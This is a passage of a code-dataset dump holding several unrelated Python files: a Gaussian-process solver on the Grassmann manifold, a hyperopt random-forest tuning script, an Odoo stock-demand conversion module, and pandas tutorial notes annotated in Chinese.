= 720\n height = 540\n name = \"Traffic Violation Detection System\"\n version = \"1\"\n\n\nclass State:\n footage = \"\"\n logging = None\n main = None\n dashboard = None\n model_path = \"\"\n pbtext_path = \"\"\n source = \"\"\n isStarted = False\n config_path = \"config/application.config\"\n config = None\n config_dict = {\n 'CAMERA_1': '/',\n 'CAMERA_2': '/'\n }\n\n","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"470631391","text":"# coding: utf-8\n \nimport GPy \nimport GPy.util as gutil\nimport numpy as np\nimport scipy as sp\nimport warnings\n \nclass G2PnetSolver:\n \"\"\"\n \n Grassmannian Gaussian Process Network (G2P-net) solver\n \n :param X: input observations, with rows as samples\n :param kernel: GPy.kern.Kern type module \n :param U: latent variables of the observation \n : \n \n \"\"\"\n \n def __init__(self, X, U, kernel, eta=0.01, tol=1e-3, max_iters=10, max_iters_kernel=100, add_regularizer=False, normalize_X = False ):\n if len(X.shape) == 1:\n X = X.reshape(-1,1)\n warnings.warn(\"One dimensional observation (N,) being shaped as (N,1)\")\n if len(U.shape) == 1:\n U = U.reshape(-1,1)\n warnings.warn(\"One dimensional input (N,) being shaped as (N,1)\")\n \n self.U = U\n self._init_U = U\n nsample, self.ndim_latent = U.shape \n \n self.X = X\n self.nsample, self.ndim = X.shape\n assert self.nsample == nsample, \"The number of samples does not match.\" \n \n if normalize_X:\n self._Xoffset = np.mean(X,axis=1)\n self._Xscale = np.std(X, axis=1)\n self.X = (X.copy() - self._Xoffset) / self._Xscale\n \n self._init_X = X\n self.XX = gutil.linalg.tdot(self.X)\n\n assert isinstance(kernel, GPy.kern.Kern), \"Use the GPy.kern.Kern type module\" \n assert kernel.input_dim == self.ndim_latent , \"The input dimension of U and kernel should match\" \n self.kern = kernel\n self._kern = self.kern\n \n self.max_iters_kernel = int(max_iters_kernel)\n print(\"Kernel initialization ...\")\n self.kern, _, self.KiX2 = self.kernel_update(X=self.X, U=self.U, kernel=self.kern)\n self.negative_loglikelihood_update()\n \n\n self.add_regularizer = add_regularizer\n\n self.eta = float(eta)\n self.max_iters = int(max_iters)\n self._max_iters = self.max_iters\n self.tol = float(tol)\n \n self.hist_kern = list()\n self.hist_nll = np.zeros([max_iters])\n self.hist_eta = np.zeros([max_iters])\n \n \n \n\n def optimize(self, max_iters = 10, tol=1e-3, init_mode = \"fixed\", optimizor=\"grad_descent\", verbose=False):\n '''\n \n The main function of optimization procedure. Calls optimize_gradient_descent if the gradient descent is required \n\n\n '''\n\n\n if optimizor == \"grad_descent_grass\":\n return self.optimize_gradient_descent_grass(max_iters, tol, verbose)\n elif optimizor == \"grad_descent\":\n return self.optimize_gradient_descent_Euclidean(max_iters, tol, verbose) \n\n\n\n \n def optimize_gradient_descent_grass(self, max_iters=10, tol=1e-3, init_mode = \"fixed\", verbose=False):\n '''\n\n Optimization procedure using gradient descent on manifold.\n\n\n '''\n self.max_iters = max_iters\n self.tol = tol\n self.hist_kern = list()\n self.hist_nll = np.zeros([max_iters])\n self.hist_eta = np.zeros([max_iters])\n\n messages = verbose\n \n eta = self.eta*np.ones([max_iters])\n self.hist_eta = eta\n for i, eta_i in enumerate(eta):\n self.hist_kern.append(self.kern)\n self.hist_nll[i] = self.negative_loglikelihood\n print(\"[step {0:3d}] neg-log-likelihood {1:9f} stepsize {2:5.3f}\".format(i, self.negative_loglikelihood, eta_i))\n # compute the grassmannian gradient\n self._gradient_U_Grassmann(mode=1)\n # update the subspace through geodesic on Grassmann manifold \n U_temp = Grassmann_update(self.U, self.H, eta_i)\n self.U = U_temp\n # update the other kernel function\n self.kern, _ , _ = self.kernel_update(X=self.X, U=self.U, kernel=self.kern, messages= messages)\n\n self.negative_loglikelihood_update()\n \n return (self.hist_nll, self.hist_eta, self.hist_kern)\n\n\n\n def optimize_gradient_descent_Euclidean(self, max_iters=10, tol=1e-3, init_mode = \"fixed\", verbose=False):\n '''\n\n Optimization procedure using gradient descent on Eulidean space.\n\n\n '''\n self.max_iters = max_iters\n self.tol = tol\n self.hist_kern = list()\n self.hist_nll = np.zeros([max_iters])\n self.hist_eta = np.zeros([max_iters])\n \n messages = verbose\n \n eta = self.eta*np.ones([max_iters])\n self.hist_eta = eta\n for i, eta_i in enumerate(eta):\n self.hist_kern.append(self.kern)\n self.hist_nll[i] = self.negative_loglikelihood\n print(\"[step {0:3d}] neg-log-likelihood {1:9f} stepsize {2:5.3f}\".format(i, self.negative_loglikelihood, eta_i))\n # compute the grassmannian gradient\n #self._gradient_U_Grassmann(mode=1)\n self._gradient_U_Euclidean(mode=1)\n # update the matrix U via gradient descent \n U_temp = Euclidean_update(self.U, self.H, eta_i)\n self.U = U_temp\n # update the other kernel function\n self.kern, _ , _ = self.kernel_update(X=self.X, U=self.U, kernel=self.kern, messages= messages)\n self.negative_loglikelihood_update()\n \n return (self.hist_nll, self.hist_eta, self.hist_kern)\n\n\n def kernel_update(self, U, X, kernel, messages = True):\n '''\n\n Given U, X, return the self.kern from GPRegression \n\n '''\n nsample , ndim = X.shape \n nsample2 , ndim_latent = U.shape\n \n assert nsample == nsample2, \"The number of rows of X and U should match\"\n assert isinstance(kernel, GPy.kern.Kern), \"Use the GPy.kern.Kern type module\" \n assert kernel.input_dim == self.ndim_latent , \"The input dimension of U and kernel should match\" \n\n model = GPy.models.GPRegression(X= U, Y = X, kernel = kernel)\n \n model.optimize(max_iters = self.max_iters_kernel, messages=messages)\n kern = model.copy().kern\n \n Kernel_mat = kern.K(U, U) \n XX = gutil.linalg.tdot(X)\n\n KiX2 , _ = gutil.linalg.dpotrs(np.asfortranarray(Kernel_mat), np.asfortranarray(XX), lower=1)\n return (kern, XX, KiX2)\n\n\n def _gradient_K(self, mode=0):\n '''\n \n Learn the gradient of the negative log-likelihood of Gaussian Process with respect to the kernel matrix K. Require GPy package installed. \n \n Try: pip install GPy\n \n .. math::\n \n \\frac{dL}{dK} = 2*T - diag(diag(T)) \n \n T = (ndim*K^{-1} - K^{-1}*X*X'*K^{-1})\n :param mode: =0 in test mode, =1 in working mode\n :param Kernel: nsample x nsamples positive definite matrix with i,j elemen being K(Zi, Zj)\n :type Kernel: numpy.ndarray\n :param X: nsample x ndim data matrix of observations of Gaussian Process\n :type X: numpy.ndarray\n :param nsample: number of samples\n :type nsample: float\n :param ndim: dimension of observation data\n :type ndim: int\n \n '''\n Kernel = self.kern.K(self.U, self.U)\n S = self.XX\n try:\n KiX2 = self.KiX2\n except AttributeError:\n print(\"No KiX2 stored. Recompute\")\n KiX2 , _ = gutil.linalg.dpotrs(np.asfortranarray(Kernel), np.asfortranarray(S), lower=1)\n else:\n if(mode == 1):\n KiX2 , _ = gutil.linalg.dpotrs(np.asfortranarray(Kernel), np.asfortranarray(S), lower=1)\n # KiS = K^{-1}*X*X'\n \n KiXXiK , _ = gutil.linalg.dpotrs(np.asfortranarray(Kernel), np.asfortranarray(KiX2.T), lower=1)\n # KiXXiK: K^{-1}*X*X'*K^{-1}\n \n Ki , _ = gutil.linalg.dpotri(np.asfortranarray(Kernel), lower=1)\n dL_dK_0 = 0.5*(self.ndim*Ki - KiXXiK)\n self.dL_dK = 2*dL_dK_0 - np.diag(np.diag(dL_dK_0)) \n \n return self.dL_dK \n \n \n\n \n def _rbf_kernel_gradient_U(self, mode=0):\n '''\n \n Compute the gradient of RBF kernel matrix with respect to the input matrix U.\n \n .. math::\n \n \\frac{dK}{dU} = -\\frac{variance}{lengthscale^2}\\exp( -\\frac{1}{2*lengthscale^2} \\| U_{m} - U_{n} \\|^2 )*2[U_{m,,l}- U_{,m,l}]\n \n :param mode: =0 in test mode, =1 in working mode\n :param U: nsample x ndim_latent matrix. Each row corresponds to a latent input of Gaussian Process sample function.\n :type U: numpy.ndarray\n :param lengthscale: corresponds to $K(r) = variance* \\exp(-\\frac{1}{2*lengthscale^2}r^2)$ \n :type lengthscale: float\n :param variance: see above\n :type variance: float\n '''\n \n self.lengthscale = self.kern.lengthscale.values\n self.variance = self.kern.variance.values \n \n U_scaled = self.U / self.lengthscale\n Usquare = np.sum(np.square(U_scaled), 1)\n K_dist2 = -2.*gutil.linalg.tdot(U_scaled) + (Usquare[:, None] + Usquare[None, :])\n \n K_dvar = np.exp(-0.5 * K_dist2) # exp(-0.5*||zm - zn||^2 )\n \n lengthscale2 = np.square(self.lengthscale) \n K_dist = 2*(self.U[:, None, :] - self.U[None, :, :])\n self.dK_dZ = (-self.variance / lengthscale2) * np.transpose(K_dvar[:, :, np.newaxis] * K_dist, (1, 0, 2))\n \n return self.dK_dZ\n \n \n def _gradient_U(self, mode=0):\n '''\n\n return dL/dU, the gradient of log-likelihood with respect to input variables Z via chain rule\n \n '''\n # pre-compute the gradient dL/dK and dK/dU \n try:\n self.dL_dK\n except AttributeError:\n print(\"The gradient of L w.r.t K not been computed. Just compute it anyway.\")\n self._gradient_K() \n else:\n if(mode == 1):\n self._gradient_K(mode)\n \n try:\n self.dK_dZ\n except AttributeError:\n print(\"The gradient of K w.r.t. U not been computed. Just compute it anyway\")\n if self.kern.name == 'rbf':\n self._rbf_kernel_gradient_U()\n else:\n if(mode == 1):\n if self.kern.name == 'rbf':\n self._rbf_kernel_gradient_U(mode)\n\n self.dL_dU = np.sum(self.dK_dZ * self.dL_dK.T[:, :, None], 0)\n return self.dL_dU\n\n\n def _gradient_U_Grassmann(self, mode=0):\n '''\n\n Compute DL/dU, the natural gradient of Likelihood w.r.t. U on the Grassmann manifold\n \n .. math::\n \\mathbf{G} = (\\mathbf{I}- \\mathbf{UU}^{T})*\\frac{dL}{dU}\n\n '''\n # pre-compute the Euclidean gradient dL/dU\n try: \n self.dL_dU\n except AttributeError:\n print(\"The gradient of L w.r.t. U not been computed. Just compute it anyway.\")\n self._gradient_U()\n else:\n if (mode == 1):\n self._gradient_U(mode)\n \n #projection on orthogonal direction\n U_orth = np.eye(self.nsample) - gutil.linalg.tdot(self.U)\n self.G = np.dot(U_orth, self.dL_dU)\n self.H = -self.G\n return (self.G, self.H)\n \n \n def _gradient_U_Euclidean(self, mode=0):\n '''\n\n Compute DL/dU, the natural gradient of Likelihood w.r.t. U on the Grassmann manifold\n \n .. math::\n \\mathbf{G} = (\\mathbf{I}- \\mathbf{UU}^{T})*\\frac{dL}{dU}\n\n '''\n # pre-compute the Euclidean gradient dL/dU\n try: \n self.dL_dU\n except AttributeError:\n print(\"The gradient of L w.r.t. U not been computed. Just compute it anyway.\")\n self._gradient_U()\n else:\n if (mode == 1):\n self._gradient_U(mode)\n \n #projection on orthogonal direction\n U_orth = np.eye(self.nsample) #- gutil.linalg.tdot(self.U)\n self.G = np.dot(U_orth, self.dL_dU)\n self.H = -self.G\n return (self.G, self.H)\n\n\n\n \n def negative_loglikelihood_update(self):\n ''' \n\n Compute the negative log-likelihood of Gaussian distribution\n \n .. math::\n negative-loglikelihood = \\frac{p*N}{2}\\log(2\\pi) + \\frac{p}{2}\\log\\det(K) + \\frac{1}{2}\\text{tr}(K^{-1}X*X^{T})\n \n '''\n K = self.compute_kernel_mat()\n sign , K_logdet = np.linalg.slogdet(K)\n try:\n KiX2 = self.KiX2\n except AttributeError:\n print(\"No KiX2 stored. Recompute\") \n KiX2 , _ = gutil.linalg.dpotrs(np.asfortranarray(K), np.asfortranarray(self.XX), lower=1)\n \n \n KiX2_trace = np.trace(KiX2)\n \n self.negative_loglikelihood = (self.ndim*self.nsample) / 2 * np.log(2*np.pi) \\\n + self.ndim / 2 * K_logdet + 1/2* KiX2_trace\n\n\n\n def compute_kernel_mat(self):\n return self.kern.K(self.U, self.U) \n \n \n def get_G(self):\n try: \n self.G\n except AttributeError:\n print(\"The tangent direction of L w.r.t. U not been computed. Just compute it anyway.\")\n self.gradient_U_Grassmann()\n return self.G\n\n \n def get_H(self):\n try: \n self.H\n except AttributeError:\n print(\"The negative tangent direction of L w.r.t. U not been computed. Just compute it anyway.\")\n self.gradient_U_Grassmann()\n return self.H\n\n \n def get_X(self):\n return self.X\n\n def get_U(self):\n return self.U\n \n# def __str__(self):\n# self.print_param()\n# self.print_solver()\n \n def print_param(self):\n print(\"Parameter Information: \")\n print(\"total samples: \" + str(self.nsample))\n print(\"observation dimension: \" + str(self.ndim))\n print(\"latent variable dimension: \" + str(self.ndim_latent))\n print(self.kern)\n\n def print_solver(self):\n print(\"Solver settings: \")\n print(\"stepsize eta: \" + str(self.eta))\n print(\"total iterations: \" + str(self.iterations))\n print(\"tolerance threshold: \" + str(self.tol))\n \n \n def get_optimize_trajectory(self):\n return (self.hist_nll, self.hist_eta, self.hist_kern)\n\n\n\n def restart(self):\n\n print(\"Solver restart ...\")\n self.U = self._init_U\n self.X = self._init_X\n\n _ , self.ndim_latent = self.U.shape \n\n self.nsample, self.ndim = self.X.shape\n \n self.XX = gutil.linalg.tdot(self.X)\n\n self.kern = self._kern\n \n self.negative_loglikelihood_update()\n max_iters = self._max_iters \n self.hist_kern = list()\n self.hist_nll = np.zeros([max_iters])\n self.hist_eta = np.zeros([max_iters])\n try:\n self.G\n except AttributeError:\n print(\"No G.\")\n else:\n self.G = np.zeros(self.G.shape) \n\n try:\n self.H\n except AttributeError:\n print(\"No H.\")\n else:\n self.H = np.zeros(self.H.shape) \n\n\n try:\n self.KiX2\n except AttributeError:\n print(\"No G.\")\n else:\n del self.KiX2\n\n\n\n\n'''\n-----------------------------------------------------------------------------------------\n\n Auxilary function \n\n-----------------------------------------------------------------------------------------\n'''\n \ndef Grassmann_update(U, H, eta):\n '''\n \n Compute the update of U in direction of H along the geodesic of the Grassmann manifold\n .. math::\n U' = U*V*\\cos(\\eta*\\Sigma)*V^{T} + W*\\sin(\\eta*\\Sigma)*V^{T}\n \n :param U: the initial point of U on Grassmann manifold\n :type U: numpy.ndarray\n :param H: the tangent direction of curve on the manifold\n :type H: numpy.ndarray\n :param eta: the stepsize \n :type eta: float\n\n '''\n # compute the svd of tangent vector H \n U_sig, sig, Vh_sig = sp.linalg.svd(H, full_matrices=False)\n ndim_latent, _ = Vh_sig.shape\n # compute the two orthogonal channels\n Sig_cos = sp.linalg.diagsvd(np.cos(eta*sig), ndim_latent, ndim_latent)\n Sig_sin = sp.linalg.diagsvd(np.sin(eta*sig), ndim_latent, ndim_latent) \n # compute the geodesic on Grassmann manifold\n U_new = gutil.linalg.mdot(U, (Vh_sig.T, Sig_cos, Vh_sig)) + gutil.linalg.mdot(U_sig, Sig_sin, Vh_sig)\n assert (np.allclose(np.dot(U_new.T, U_new), np.eye(ndim_latent))), \"Output not orthogonal\"\n return U_new\n\n\ndef Euclidean_update(U, H, eta):\n '''\n\n Compute the update of U in the direction of H in Euclidean space via conventional gradient descent\n\n .. math::\n U' = U + eta*H\n \n :param U: the initial point of U on Grassmann manifold\n :type U: numpy.ndarray\n :param H: the tangent direction of curve on the manifold\n :type H: numpy.ndarray\n :param eta: the stepsize \n :type eta: float\n\n '''\n U_new = U + eta*H\n return U_new ","sub_path":"src/G2PnetSolver_v1.py","file_name":"G2PnetSolver_v1.py","file_ext":"py","file_size_in_byte":16830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157942631","text":"import pandas as pd \nimport numpy as np \n\nfrom sklearn import ensemble\nfrom sklearn import model_selection\nfrom sklearn import metrics\n\nfrom functools import partial\nfrom skopt import space\nfrom skopt import gp_minimize\n\nfrom hyperopt import tpe, hp, fmin, Trials\nfrom hyperopt.pyll.base import scope\n\ndef optimize(params,x,y):\n ## Here params itself is a dict.\n model = ensemble.RandomForestClassifier(**params)\n kf = model_selection.StratifiedKFold(n_splits=5)\n accuracies =[]\n for idx in kf.split(X=x,y=y):\n train_idx,test_idx = idx[0],idx[1]\n xtrain = x[train_idx]\n ytrain = y[train_idx]\n\n xtest = x[test_idx]\n ytest = y[test_idx]\n\n model.fit(xtrain,ytrain)\n\n pred = model.predict(xtest)\n\n fold_acc = metrics.accuracy_score(ytest,pred)\n\n accuracies.append(fold_acc)\n return -1.0 * np.mean(accuracies)\n\nif __name__ ==\"__main__\":\n df = pd.read_csv('../input/mobile-train.csv')\n X= df.drop(\"price_range\",axis=1).values \n y = df.price_range.values \n\n param_space = {\n 'max_depth':scope.int(hp.quniform('max_depth',3,15,1)),\n 'n_estimators':scope.int(hp.quniform('n_estimators',100,600,1)),\n 'criterion':hp.choice('criterion',['gini','entropy']),\n 'max_features':hp.uniform('max_features',0.01,1), \n\n }\n#quniform == int, choice = if we have value on list, uniform= float\n optimization_function = partial(optimize,x=X,y=y)\n trials =Trials()\n result = fmin(\n fn=optimization_function,\n space = param_space,\n algo = tpe.suggest,\n max_evals = 15,\n trials=trials,\n )\n\n #print(dict(zip(param_names,x.result)))\n\n print(result)","sub_path":"model validation/src/hyperopt_optimize.py","file_name":"hyperopt_optimize.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"646023606","text":"# -*- coding: utf-8 -*-\n###########################################################################################\n#\n# module name for OpenERP\n# Copyright (C) 2015 qdodoo Technology CO.,LTD. ().\n#\n###########################################################################################\n\nfrom openerp import models, fields, api\nfrom openerp.osv import osv\nimport xlrd\nimport base64\nfrom openerp.tools.translate import _\nfrom datetime import timedelta, datetime\nimport logging\nfrom openerp import SUPERUSER_ID\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\n_logger = logging.getLogger(__name__)\n\nPROCUREMENT_PRIORITIES = [('0', u'不紧急'), ('1', u'一般'), ('2', u'紧急的'), ('3', u'非常紧急')]\n\n\nclass qdodoo_stock_demand(models.Model):\n \"\"\"\n 转换单模型\n \"\"\"\n _name = 'qdodoo.stock.demand' # 模型名称\n _description = 'tet.Template.line' # 模型描述\n\n name = fields.Char(u'转换单', copy=False)\n partner_id = fields.Many2one('res.partner', string=u'客户')\n create_datetime = fields.Datetime(string=u'创建日期', copy=False)\n date_planed = fields.Datetime(string=u'计划日期', required=True, copy=False)\n location_id = fields.Many2one('stock.warehouse', string=u'仓库', required=True)\n location_id2 = fields.Many2one('stock.location', string=u'需求库位')\n rule_id = fields.Many2one('procurement.rule', 'Rule', track_visibility='onchange')\n origin = fields.Char(u'源单据')\n bom_id = fields.Many2one('mrp.bom', u'物料清单')\n purchase_id = fields.Many2one('purchase.order', u'采购订单')\n priority_new = fields.Selection(PROCUREMENT_PRIORITIES, u'优先级', required=True, select=True, )\n route_ids = fields.Many2many('stock.location.route', 'stock_location_route_demand', 'procurement_id',\n 'route_id',\n 'Preferred Routes', readonly=True)\n route_id = fields.Many2one('stock.location.route', string=u'路线', copy=False, required=True)\n group_id = fields.Many2one('procurement.group', string=u'采购组', required=True)\n company_id = fields.Many2one('res.company', string=u'公司', copy=False)\n state = fields.Selection([('draft', u'草稿'),\n ('done', u'完成'),\n ], u'状态', copy=False)\n qdodoo_stock_product_ids = fields.One2many('qdodoo.stock.product', 'qdodoo_stock_demand_id', u'产品明细')\n import_file = fields.Binary(string=\"导入的Excel文件\")\n demand_id = fields.Many2one('qdodoo.stock.demand', string=u'源需求转换单', copy=False)\n\n _defaults = {\n 'create_datetime': datetime.now(),\n 'date_planed': datetime.now(),\n 'state': 'draft',\n 'priority_new': '1',\n 'name': lambda obj, cr, uid, context: '/',\n 'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid,\n 'qdodoo.stock.demand',\n context=c),\n }\n\n def btn_import_data(self, cr, uid, ids, context=None):\n wiz = self.browse(cr, uid, ids[0])\n if wiz.import_file:\n try:\n excel = xlrd.open_workbook(file_contents=base64.decodestring(wiz.import_file))\n except:\n raise osv.except_osv(_(u'提示'), _(u'请使用xls文件进行上传'))\n product_info = excel.sheet_by_index(0)\n product_obj = self.pool.get('product.product')\n company_obj = self.pool.get('res.company')\n qdodoo_obj = self.pool.get('qdodoo.stock.product')\n lst = []\n for obj in range(1, product_info.nrows):\n val = {}\n # 获取产品编号\n default_code = product_info.cell(obj, 0).value\n if not default_code:\n raise osv.except_osv(_(u'提示'), _(u'第%s行,产品编号不能为空') % obj)\n # 获取产品数量\n product_qty = product_info.cell(obj, 3).value\n if not product_qty:\n raise osv.except_osv(_(u'提示'), _(u'第%s行,产品数量不能为空') % obj)\n # 获取公司id\n company_name = product_info.cell(obj, 2).value\n if not company_name:\n raise osv.except_osv(_(u'提示'), _(u'第%s行,公司不能为空') % obj)\n company = company_obj.search(cr, uid, [('name', '=', company_name)])\n # 查询系统中对应的产品id\n product_id = product_obj.search(cr, uid,\n [('default_code', '=', default_code), ('company_id', '=', company)])\n if not product_id:\n raise osv.except_osv(_(u'提示'), _(u'本公司没有编号为%s的产品') % default_code)\n else:\n product = product_obj.browse(cr, uid, product_id[0])\n val['product_id'] = product.id\n val['name'] = product.name\n val['uom_id'] = product.uom_id.id\n val['qdodoo_stock_demand_id'] = wiz.id\n val['product_qty'] = product_qty\n lst.append(val)\n for res in lst:\n qdodoo_obj.create(cr, uid, res)\n self.write(cr, uid, wiz.id, {'import_file': ''})\n else:\n raise osv.except_osv(_(u'提示'), _(u'请先上传模板'))\n\n def change_location_id(self, cr, uid, ids, location_id, context=None):\n if location_id:\n warehouse = self.pool.get('stock.warehouse').browse(cr, uid, location_id, context=context)\n return {'value': {'location_id2': warehouse.lot_stock_id.id}}\n return {}\n\n def create(self, cr, uid, vals, context=None):\n # if vals.get('name', '/') == '/':\n vals['name'] = self.pool.get('ir.sequence').get(cr, uid, 'qdodoo.stock.demand') or '/'\n context = dict(context or {}, mail_create_nolog=True)\n order = super(qdodoo_stock_demand, self).create(cr, uid, vals, context=context)\n return order\n\n def btn_action_conversion(self, cr, uid, ids, context=None):\n if context == None:\n context = {}\n praper_obj = self.pool.get('procurement.order')\n inv_obj = self.browse(cr, uid, ids[0], context=context)\n line_new = self.browse(cr, uid, ids[0], context=context)\n return_list = []\n for line in line_new.qdodoo_stock_product_ids:\n values = {\n 'stock_demand_number': inv_obj.name,\n 'partner_dest_id': inv_obj.partner_id.id,\n 'warehouse_id': inv_obj.location_id.id,\n 'location_id': inv_obj.location_id2.id,\n 'date_planned': inv_obj.date_planed,\n 'group_id': inv_obj.group_id.id,\n 'origin': inv_obj.origin,\n 'priority_new': '1',\n 'state': 'confirmed',\n 'purchase_id': inv_obj.purchase_id.id,\n 'rule_id': inv_obj.rule_id.id,\n 'bom_id': inv_obj.bom_id.id,\n 'name': line.product_id.name,\n 'product_id': line.product_id.id,\n 'product_qty': line.product_qty,\n 'product_uom': line.uom_id.id,\n 'qdodoo_stock_demand_id': ids[0],\n 'company_id': line_new.company_id.id,\n 'order_id_new': line_new.id,\n }\n res = praper_obj.create(cr, uid, values, context=context)\n return_list.append(res)\n list_ids = [res]\n if inv_obj.route_id:\n sql = \"\"\"insert INTO stock_location_route_procurement (procurement_id, route_id) VALUES (%s,%s)\"\"\" % (\n res, inv_obj.route_id.id)\n cr.execute(sql)\n self.pool.get('procurement.order').run(cr, uid, list_ids, context=context)\n inv_obj.write({'state': 'done'})\n\n\nclass qdodoo_stock_product(models.Model):\n _name = 'qdodoo.stock.product'\n\n product_id = fields.Many2one('product.product', string=u'产品', required=True)\n product_qty = fields.Float(string=u'数量', required=True)\n name = fields.Char(u'备注')\n uom_id = fields.Many2one('product.uom', string=u'单位', required=True)\n qdodoo_stock_demand_id = fields.Many2one('qdodoo.stock.demand', string=u'需求单')\n\n def onchange_product_id(self, cr, uid, ids, product_id, context=None):\n res = {}\n res['value'] = {}\n if product_id:\n product_obj = self.pool.get('product.product').browse(cr, uid, product_id, context=context)\n res['value']['name'] = product_obj.product_tmpl_id.name\n res['value']['uom_id'] = product_obj.uom_id.id,\n return res\n else:\n return {}\n","sub_path":"qdodoo_stock_demand/qdodoo_stock_demand.py","file_name":"qdodoo_stock_demand.py","file_ext":"py","file_size_in_byte":9014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"550388886","text":"# Data Analysis with Python (Chapter 5)\r\n# Getting Started with Pandas\r\n\r\nfrom pandas import Series, DataFrame\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nimport pandas_datareader.data as web\r\nfrom pandas import MultiIndex\r\n\r\n##########################################\r\n# Introduction to pandas Data Structures\r\n##########################################\r\n\r\n###########\r\n# Series\r\n###########\r\nobj = Series([4, 7, -5, 3])\r\nobj.index\r\nobj.values\r\n# 创建Series时自定义index\r\nobj2 = Series([4, 7, -5, 3], index=['d', 'b', 'a', 'c'])\r\nobj2.index\r\n\r\nobj2['a'] # 通过index来获取对应的value\r\nobj2['d'] = 6 # 重新设定index 'd'的value\r\n\r\n# 对Series做一下操作仍会保留对应index\r\nobj2[obj2 > 0]\r\nobj2 * 2\r\nnp.exp(obj2)\r\n# 把Series想成一个fixed-length, ordered dict, as it is a mappingof index values to data values.\r\n'b' in obj2 # True\r\n'e' in obj2 # False\r\n\r\n# 通过python dict来生成Series\r\n# When only passing a dict, the index in the resulting Series will have the dict’s keys in sorted order.\r\nsdata = {'Ohio': 35000, 'Texas': 71000, 'Oregon': 16000, 'Utah': 5000}\r\nobj3 = Series(sdata)\r\n# sdata dict中没有'California',obj4中 以'California'为index对应的value为NaN\r\nstates = ['California', 'Ohio', 'Oregon', 'Texas']\r\nobj4 = Series(sdata, index=states)\r\n\r\n# The isnull and notnull functions in pandas should be used to detect missing data:\r\n# 返回对应的 以True/False masked Series\r\npd.isnull(obj4) \r\npd.notnull(obj4)\r\n\r\n# A critical Series feature for many applications is that it automatically aligns differently \r\n# indexed data in arithmetic operations:\r\nobj3 +obj4 # 两个Series中index对应相同的value相加; Series中独特的index保留其value,列出于结果中\r\n\r\n# A Series’s index can be altered in place by assignment:\r\nobj.index = ['Bob', 'Steve', 'Jeff', 'Ryan']\r\n\r\n\r\n###########\r\n# Data Frame\r\n###########\r\ndata = {'state': ['Ohio', 'Ohio', 'Ohio', 'Nevada', 'Nevada'],\r\n'year': [2000, 2001, 2002, 2001, 2002],\r\n'pop': [1.5, 1.7, 3.6, 2.4, 2.9]}\r\nframe = DataFrame(data) # 通过dict来生成df\r\n\r\nDataFrame(data, columns=['year', 'state', 'pop']) # 若data中有更多的key:value pairs,可以指定用其中的一部分\r\n\r\n# if you pass a column that isn’t contained in data, it will appear with NA values in the result:\r\nframe2 = DataFrame(data, columns=['year', 'state', 'pop', 'debt'],\r\n index=['one', 'two', 'three', 'four', 'five'])\r\nframe2.columns # 显示DataFrame中的列名\r\n\r\n# 从DataFrame中取出其中一列(2种方法等价):\r\nframe2['state'] # by dict-like notation\r\nframe2.year # by attribute\r\n\r\n# Rows can also be retrieved by position or name by a couple of methods, such as the ix indexing field:\r\nframe2.ix['three'] # 取出index为'three'的row; index=['one', 'two', 'three', 'four', 'five']\r\n\r\n# Columns can be modified by assignment. \r\nframe2['debt'] = 16.5 # 将'debt'这一列全部设为16.5\r\nframe2['debt'] = np.arange(5.) # np.arange返回 0, 1, 2, 3, 4\r\n # np.arange: return evenly spaced values within a given interval\r\n# 将单独的一个Series加入DataFrame中\r\n# When assigning lists or arrays to a column, the value’s length must match the length of the DataFrame.\r\n# If you assign a Series, it will be instead conformed exactly to the DataFrame’s index, \r\n# inserting missing values in any holes.\r\nval = Series([-1.2, -1.5, -1.7], index=['two', 'four', 'five'])\r\nframe2['debt'] = val # 使用val Series对frame2中的'debt'列赋值; \r\n # index须一一对应,没有对应的插入missing value (NaN)\r\n# Assigning a column that doesn’t exist will create a new column. \r\n# The del keyword will delete columns as with a dict:\r\nframe2['eastern'] = frame2.state == 'Ohio' # 在df中创建新一列'eastern':该列的值为True/False(根据frame2.state == 'Ohio')\r\ndel frame2['eastern'] # 删除df中的'eastern'列\r\nframe2.columns\r\n\r\n# 通过nested dict来创建Data Frame\r\npop = {'Nevada': {2001: 2.4, 2002: 2.9},\r\n 'Ohio': {2000: 1.5, 2001: 1.7, 2002: 3.6}}\r\nframe3 = DataFrame(pop)\r\n\r\n# 设置df的index name和column name\r\nframe3.index.name = 'year'; frame3.columns.name = 'state' \r\nframe3.T # df转置\r\n\r\n\r\n###########\r\n# Index Objects\r\n###########\r\n\r\n# pandas’s Index objects are responsible for holding the axis labels and other metadata (like the axis name or names). \r\n# Any array or other sequence of labels used when constructing a Series or DataFrame is internally converted to an Index.\r\n\r\nobj = Series(range(3), index=['a', 'b', 'c'])\r\nindex = obj.index\r\nindex[1:] # 对Series的index obj做index\r\n# Index objects are immutable and thus can’t be modified by the user. (只能生成Series/DataFrame时assign index)\r\n# index[1] = 'd' 会报错\r\n'Ohio' in frame3.columns # True\r\n2003 in frame3.index # False\r\n\r\n\r\n###############################\r\n# Essential Functionality\r\n###############################\r\n\r\n#############\r\n# Reindexing\r\n#############\r\n# Create a new object with the data conformed to a new index.\r\nobj = Series([4.5, 7.2, -5.3, 3.6], index=['d', 'b', 'a', 'c'])\r\n# reindex with the original data\r\nobj2 = obj.reindex(['a', 'b', 'c', 'd', 'e']) # index为'e'时,value为NaN\r\nobj.reindex(['a', 'b', 'c', 'd', 'e'], fill_value=0) # 将缺失值处理为 0\r\n\r\n# The method option allows us to do this, using a method such as ffill which forward fills the values:\r\nobj3 = Series(['blue', 'purple', 'yellow'], index=[0, 2, 4])\r\nobj3.reindex(range(6), method='ffill') # 前向值填充(填充的值与该index的前一个值相同)\r\n# reindex methods:\r\n# 'ffill' or 'pad': Fill (or carry) values forward\r\n# 'bfill' or 'backfill': Fill (or carry) values backward\r\n\r\n# With DataFrame, reindex can alter either the (row) index, columns, or both.\r\nframe = DataFrame(np.arange(9).reshape((3, 3)), index=['a', 'c', 'd'],\r\n columns=['Ohio', 'Texas', 'California'])\r\nframe2 = 